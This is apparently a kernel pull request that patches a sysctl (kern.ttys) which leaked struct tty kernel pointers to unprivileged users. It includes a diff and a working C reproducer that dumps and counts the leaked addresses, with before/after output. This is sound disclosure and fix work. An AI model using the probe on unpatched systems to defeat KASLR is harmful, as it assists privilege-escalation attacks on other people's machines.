### PR TITLE
tty: kernel pointer leak via kern.ttys sysctl

### DIFF
--- a/sys/kern/tty.c
+++ b/sys/kern/tty.c
@@ -2911,6 +2911,31 @@ sysctl_kern_ttys(SYSCTL_HANDLER_ARGS)
 		t = *tp;
 		if (t.t_dev)
 			t.t_dev = (cdev_t)(uintptr_t)devid_from_dev(t.t_dev);
+		/*
+		 * Zero every kernel-pointer field before copyout so we do not
+		 * leak kernel .text/.rodata/.heap addresses (KASLR defeat +
+		 * heap layout) to unprivileged readers of kern.ttys.  Only
+		 * t_dev is rewritten (to a devid) above; every other pointer-
+		 * bearing field is nulled here.  Mirrors the sanitized-export
+		 * pattern used by kinfo_file in kern_descrip.c.
+		 */
+		bzero(&t.t_token, sizeof(t.t_token));	/* lwkt_token: t_ref, t_desc */
+		t.t_rawq.c_data = NULL;
+		t.t_canq.c_data = NULL;
+		t.t_outq.c_data = NULL;
+		t.t_pgrp = NULL;
+		t.t_session = NULL;
+		t.t_sigio = NULL;
+		bzero(&t.t_rkq, sizeof(t.t_rkq));	/* kqinfo: ki_note (klist ptr) */
+		bzero(&t.t_wkq, sizeof(t.t_wkq));
+		t.t_oproc = NULL;
+		t.t_stop = NULL;
+		t.t_param = NULL;
+		t.t_unhold = NULL;
+		t.t_sc = NULL;
+		t.t_slsc = NULL;
+		t.t_list.tqe_next = NULL;		/* TAILQ_ENTRY: list linkage */
+		t.t_list.tqe_prev = NULL;
 		error = SYSCTL_OUT(req, (caddr_t)&t, sizeof(t));
 		if (error)
 			break;


### PR DESCRIPTION
# tty: kernel pointer leak via kern.ttys sysctl

`sysctl_kern_ttys()` in `sys/kern/tty.c` copies each `struct tty` verbatim to userspace (`t = *tp;` then `SYSCTL_OUT(req, &t, sizeof(t))`), sanitizing only `t_dev`. `struct tty` embeds kernel `.text` function pointers (`t_oproc`/`t_stop`/`t_param`/`t_unhold`) and heap pointers (`t_pgrp`/`t_session`/`t_sigio`/`t_sc`/`t_slsc`, the per-clist `c_data`, the `TAILQ t_list` linkage, and the `kqinfo` klists in `t_rkq`/`t_wkq`), all of which are leaked. The OID is `CTLFLAG_RD` and sysctl reads are not privilege-gated, so any unprivileged local user can read it; on a default system a single read leaks ~100 kernel-range pointer-sized values, including `.text`-segment addresses that defeat KASLR and slab/direct-map heap addresses that reveal heap layout for grooming a separate corruption bug.

## Fix

In `sysctl_kern_ttys`, after the struct copy and the `t_dev` devid rewrite, zero every pointer-bearing field of the local copy before `SYSCTL_OUT`: the embedded `lwkt_token`, the three clist `c_data`, `t_pgrp`/`t_session`/`t_sigio`, the `t_rkq`/`t_wkq` `kqinfo`s, the four `.text` function pointers, `t_sc`/`t_slsc`, and the `TAILQ t_list` linkage. This mirrors the sanitized-export pattern used by `kinfo_file` in `kern_descrip.c`. An obvious earlier iteration zeroed the plain fields but missed `t_list`: the handler inserts a stack marker after each tty during the walk, so `t_list` leaked that marker and the global `tty_list` head — the `t_list` zeroing is included here.

## Before / after

```
#0 unpatched (sys/kern/tty.c), ./leak_ttys run as uid 1001
got 3760 bytes from kern.ttys
  blob offset  256 (word  32): 0xffffffff80b8c0f0   # .text (t_oproc etc.)
  ...
  blob offset  352 (word  44): 0xfffff801182eb600   # t_list.tqe_next (marker)
  blob offset  360 (word  45): 0xffffffff810e5200   # t_list.tqe_prev (tty_list)
  ...
total kernel-range pointer-sized values leaked: 102
```

```
#1 patched, same ./leak_ttys run as uid 1001
got 3760 bytes from kern.ttys
total kernel-range pointer-sized values leaked: 0      (deterministic x3)
```

## Reproducer

```
cc -o leak_ttys leak_ttys.c
./leak_ttys            # as any unprivileged user; leaks on #0, clean on #1
```

```c
/* kern.ttys leak probe: read the sysctl blob and report how many
 * pointer-sized values fall in the amd64 kernel address range. */
#include <sys/types.h>
#include <sys/sysctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* amd64 canonical kernel range: the upper half, where DragonFly maps
 * kernel .text (~0xffffffff80000000) and the direct-map heap
 * (~0xffff800000000000). */
static int
looks_like_kaddr(uint64_t v)
{
	return (v >= 0xffff800000000000ULL);
}

int
main(void)
{
	void *buf = NULL;
	size_t len = 0;

	if (sysctlbyname("kern.ttys", NULL, &len, NULL, 0) != 0) {
		perror("sysctlbyname(getlen)");
		return 1;
	}
	if (len == 0) {
		printf("kern.ttys returned 0 bytes (no ttys registered)\n");
		return 0;
	}
	buf = malloc(len);
	if (buf == NULL) {
		perror("malloc");
		return 1;
	}
	if (sysctlbyname("kern.ttys", buf, &len, NULL, 0) != 0) {
		perror("sysctlbyname(get)");
		free(buf);
		return 1;
	}

	printf("got %zu bytes from kern.ttys\n", len);

	/* Optional: dump the raw blob for offline `nm` cross-reference. */
	FILE *fp = fopen("ttys.bin", "wb");
	if (fp) {
		fwrite(buf, 1, len, fp);
		fclose(fp);
		printf("raw blob written to ttys.bin\n");
	}

	const uint64_t *p = (const uint64_t *)buf;
	size_t n = len / sizeof(*p);
	size_t leaked = 0;
	for (size_t i = 0; i < n; i++) {
		if (looks_like_kaddr(p[i])) {
			if (leaked < 60)	/* cap printed output */
				printf("  blob offset %5zu (word %4zu): 0x%016llx\n",
				       (size_t)(i * sizeof(*p)), i,
				       (unsigned long long)p[i]);
			leaked++;
		}
	}
	printf("total kernel-range pointer-sized values leaked: %zu\n", leaked);

	free(buf);
	return (leaked > 0) ? 0 : 2;
}
```
